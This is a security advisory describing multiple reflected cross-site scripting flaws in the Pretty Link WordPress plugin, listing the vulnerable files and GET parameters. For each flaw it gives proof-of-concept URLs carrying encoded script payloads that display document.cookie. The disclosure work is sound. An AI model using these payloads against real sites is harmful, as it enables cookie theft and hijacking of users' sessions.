Cross-site Scripting Vulnerabilities in Pretty Link WordPress Plugin

2011-09-21T00:00:00
ID HTB23049
Type htbridge
Reporter High-Tech Bridge
Modified 2011-09-21T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pretty Link WordPress Plugin which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerabilities in Pretty Link WordPress Plugin
1.1 Input passed via the "min_date" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-clicks/head. php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.2 Input passed via the "message" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-dashboard-wi dget/widget.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.3 Input passed via the "prli_blogurl", "values" GET parameters to /wp-content/plugins/pretty-link/classes/views/prli-links/form.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.p hp?prli_blogurl=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.p hp?values[slug]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.p hp?values[name]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.p hp?values[description]=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.p hp?values[redirect_type][307]=%22%3E%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.p hp?values[redirect_type][301]=%22%3E%3Cscript%3Ealert%28document.cookie%29;% 3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.4 Input passed via the "errors" GET parameter to /wp-content/plugins/pretty-link/classes/views/shared/errors.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/errors.php ?errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.5 Input passed via the "page_first_record", "page_last_record", "record_count", "controller_file", "page_params" GET parameters to /wp-content/plugins/pretty-link/classes/views/shared/table-nav.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav. php?page_count=2&page_first_record=%3Cscript%3Ealert%28document.cookie%29;%3 C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav. php?page_count=2&page_last_record=%3Cscript%3Ealert%28document.cookie%29;%3C /script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav. php?page_count=2&record_count=%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav. php?page_count=2&current_page=2&controller_file=%27%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav. php?page_count=2&current_page=2&page_params=%27%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.